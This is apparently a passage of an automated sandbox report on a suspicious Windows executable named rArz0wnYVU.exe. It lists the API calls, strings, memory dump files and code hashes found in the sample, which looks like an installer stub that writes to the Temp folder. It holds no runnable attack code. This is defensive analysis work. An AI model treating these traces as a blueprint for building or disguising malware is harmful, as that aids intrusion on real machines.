            • SetCursor.USER32(00000000), ref: 00404605
            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404634
            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404646
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
            • String ID: : Completed$N$VC@$open
            • API String ID: 3615053054-1580302019
            • Opcode ID: 33f5e1601642234e7e85cd0b58378a626179fffef457767216124dc14c27a8cd
            • Instruction ID: ef28e404984a924d02769b335405a58d84a4f5c10dd13b46e9d300bde90bb2c1
            • Opcode Fuzzy Hash: 33f5e1601642234e7e85cd0b58378a626179fffef457767216124dc14c27a8cd
            • Instruction Fuzzy Hash: 717191B1A00209BFDB10AF60DD45E6A7B69FB94344F00843AFB05B62E0D779AD51CF98
            APIs
            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
            • BeginPaint.USER32(?,?), ref: 00401047
            • GetClientRect.USER32(?,?), ref: 0040105B
            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
            • DeleteObject.GDI32(?), ref: 004010ED
            • CreateFontIndirectW.GDI32(?), ref: 00401105
            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
            • SelectObject.GDI32(00000000,?), ref: 00401140
            • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
            • SelectObject.GDI32(00000000,00000000), ref: 00401160
            • DeleteObject.GDI32(?), ref: 00401165
            • EndPaint.USER32(?,?), ref: 0040116E
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
            • String ID: F
            • API String ID: 941294808-1304234792
            • Opcode ID: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
            • Instruction ID: fbc3582f0be17511ef24b6208279bd62f68a22b1f89f17edcf88e24f0ff4dafb
            • Opcode Fuzzy Hash: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
            • Instruction Fuzzy Hash: 8E418A71800209AFCF058F95DE459AFBBB9FF44310F00842EF991AA1A0C738EA55DFA4
            APIs
            • lstrcpyW.KERNEL32(00426DC8,NUL,?,00000000,?,?,00406040,?,?), ref: 00405EBC
            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00406040,?,?), ref: 00405EE0
            • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00405EE9
              • Part of subcall function 00405CB8: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CC8
              • Part of subcall function 00405CB8: lstrlenA.KERNEL32(00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CFA
            • GetShortPathNameW.KERNEL32(004275C8,004275C8,00000400), ref: 00405F06
            • wsprintfA.USER32 ref: 00405F24
            • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 00405F5F
            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F6E
            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
            • SetFilePointer.KERNEL32(0040A588,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A588,00000000,[Rename],00000000,00000000,00000000), ref: 00405FFC
            • GlobalFree.KERNEL32(00000000), ref: 0040600D
            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406014
              • Part of subcall function 00405D53: GetFileAttributesW.KERNELBASE(00000003,00402E84,00438800,80000000,00000003), ref: 00405D57
              • Part of subcall function 00405D53: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D79
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
            • String ID: %ls=%ls$NUL$[Rename]
            • API String ID: 222337774-899692902
            • Opcode ID: 8300d2f85c22f639866f12053983f899e2c390613bda24b040072dbac4175454
            • Instruction ID: 52ae09e4e2a5e81e4d5588e003ad531eff1fe7f7ae6e2de5146a23cae23f7ad9
            • Opcode Fuzzy Hash: 8300d2f85c22f639866f12053983f899e2c390613bda24b040072dbac4175454
            • Instruction Fuzzy Hash: EB315330241B19BBD2206B209D08F2B3A5CEF85758F15043BF942F62C2EA7CC9118EBD
            APIs
            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rArz0wnYVU.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406475
            • CharNextW.USER32(?,?,?,00000000), ref: 00406484
            • CharNextW.USER32(?,00000000,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rArz0wnYVU.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00406489
            • CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rArz0wnYVU.exe",00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 0040649C
            Strings
            • *?|<>/":, xrefs: 00406464
            • "C:\Users\user\Desktop\rArz0wnYVU.exe", xrefs: 00406412
            • C:\Users\user\AppData\Local\Temp\, xrefs: 00406413
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: Char$Next$Prev
            • String ID: "C:\Users\user\Desktop\rArz0wnYVU.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
            • API String ID: 589700163-1062773263
            • Opcode ID: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
            • Instruction ID: c1b46f2de1f90aebbf911330ce555e940da56993e608f70b6a8db31027969b8c
            • Opcode Fuzzy Hash: 3235da6fa7aa45e9bf0ecdfd9fa5d30a804d535f67a6192059b6605710e04147
            • Instruction Fuzzy Hash: 5311C85680121299DB307B588C40AB7A2B8EF55754F52803FEDCA732C1E77C5C9286BD
            APIs
            • GetWindowLongW.USER32(?,000000EB), ref: 004042C6
            • GetSysColor.USER32(00000000), ref: 004042E2
            • SetTextColor.GDI32(?,00000000), ref: 004042EE
            • SetBkMode.GDI32(?,?), ref: 004042FA
            • GetSysColor.USER32(?), ref: 0040430D
            • SetBkColor.GDI32(?,?), ref: 0040431D
            • DeleteObject.GDI32(?), ref: 00404337
            • CreateBrushIndirect.GDI32(?), ref: 00404341
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
            • String ID:
            • API String ID: 2320649405-0
            • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
            • Instruction ID: 2a82f640caf94e13ad52f77eccc7f6a005bf570db5d4005cc44859485eb84fad
            • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
            • Instruction Fuzzy Hash: 9F215171600704ABCB219F68DE08B4BBBF8AF81714F04892DED95E26A0D738E904CB64
            APIs
            • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
              • Part of subcall function 00405E34: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E4A
            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: File$Pointer$ByteCharMultiWide$Read
            • String ID: 9
            • API String ID: 163830602-2366072709
            • Opcode ID: 01588cc1e6d12b9eb48a34a041857950361e167f935f48975bd7f3d5c8a3ade6
            • Instruction ID: fbd7f9394f7a40dbbdef10ea3a20ac1ae57b35180e29dd1ddeb30b88b5afce05
            • Opcode Fuzzy Hash: 01588cc1e6d12b9eb48a34a041857950361e167f935f48975bd7f3d5c8a3ade6
            • Instruction Fuzzy Hash: 19510774D00219ABDF209F94CA88AAEB779FF04344F50447BE501B72E0D7B99982DB69
            APIs
            • DestroyWindow.USER32(00000000,00000000), ref: 00402DBA
            • GetTickCount.KERNEL32 ref: 00402DD8
            • wsprintfW.USER32 ref: 00402E06
              • Part of subcall function 004052DD: lstrlenW.KERNEL32(afledes,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
              • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,afledes,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
              • Part of subcall function 004052DD: lstrcatW.KERNEL32(afledes,00402E19,00402E19,afledes,00000000,00000000,00000000), ref: 00405338
              • Part of subcall function 004052DD: SetWindowTextW.USER32(afledes,afledes), ref: 0040534A
              • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
              • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
              • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
            • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402E2A
            • ShowWindow.USER32(00000000,00000005), ref: 00402E38
              • Part of subcall function 00402D83: MulDiv.KERNEL32(0018F1A1,00000064,0018F242), ref: 00402D98
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
            • String ID: ... %d%%
            • API String ID: 722711167-2449383134
            • Opcode ID: d5f2ec4380e59cf15a00f6e840047c5153c01522355f2c47a183b9a882175795
            • Instruction ID: 67f39cb704aca6262626a7976268bb3bb8a333bdab68892006d91dd8afb4411f
            • Opcode Fuzzy Hash: d5f2ec4380e59cf15a00f6e840047c5153c01522355f2c47a183b9a882175795
            • Instruction Fuzzy Hash: 96016D70541614EBC721AB60EF4DA9B7A68AF00706B14417FF885F12E0CBF85865CBEE
            APIs
            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BC2
            • GetMessagePos.USER32 ref: 00404BCA
            • ScreenToClient.USER32(?,?), ref: 00404BE4
            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BF6
            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C1C
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: Message$Send$ClientScreen
            • String ID: f
            • API String ID: 41195575-1993550816
            • Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
            • Instruction ID: 45e0f6331f39cfe7836e80c9775163861a3897288b26a0b158bc224782e9bc0b
            • Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
            • Instruction Fuzzy Hash: C9015271901218BAEB00DB94DD45FFEBBBCAF54711F10012BBA51B61D0C7B495018B54
            APIs
            • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004057EF
            • GetLastError.KERNEL32 ref: 00405803
            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405818
            • GetLastError.KERNEL32 ref: 00405822
            Strings
            • C:\Users\user\Desktop, xrefs: 004057AC
            • C:\Users\user\AppData\Local\Temp\, xrefs: 004057D2
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: ErrorLast$CreateDirectoryFileSecurity
            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
            • API String ID: 3449924974-1521822154
            • Opcode ID: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
            • Instruction ID: b278f7ea68de5888e34302da86fdb06c438f4ef9b03e74a9ab654546e4f81ce2
            • Opcode Fuzzy Hash: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
            • Instruction Fuzzy Hash: 89010871D00619DADF10DBA0D9447EFBFB8EB04304F00803ADA44B6190E7789618DFA9
            APIs
            • GetDC.USER32(?), ref: 00401D59
            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
            • ReleaseDC.USER32(?,00000000), ref: 00401D86
            • CreateFontIndirectW.GDI32(0040CDE0), ref: 00401DD1
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: CapsCreateDeviceFontIndirectRelease
            • String ID: Calibri
            • API String ID: 3808545654-1409258342
            • Opcode ID: 5a25ca78bc8c32752d7f72089744ea34f9941ea911f474610dde7174e3f6db02
            • Instruction ID: 9e8fd183d3d9d3ef172346538d4b27734d94fdc92d2c471f4f64b2fa811a60c8
            • Opcode Fuzzy Hash: 5a25ca78bc8c32752d7f72089744ea34f9941ea911f474610dde7174e3f6db02
            • Instruction Fuzzy Hash: F601A271544641EFEB016BB0AF4AF9A3F75BB65301F104579F152B61E2CA7C0006AB2D
            APIs
            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
            • wsprintfW.USER32 ref: 00402D56
            • SetWindowTextW.USER32(?,?), ref: 00402D66
            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D78
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
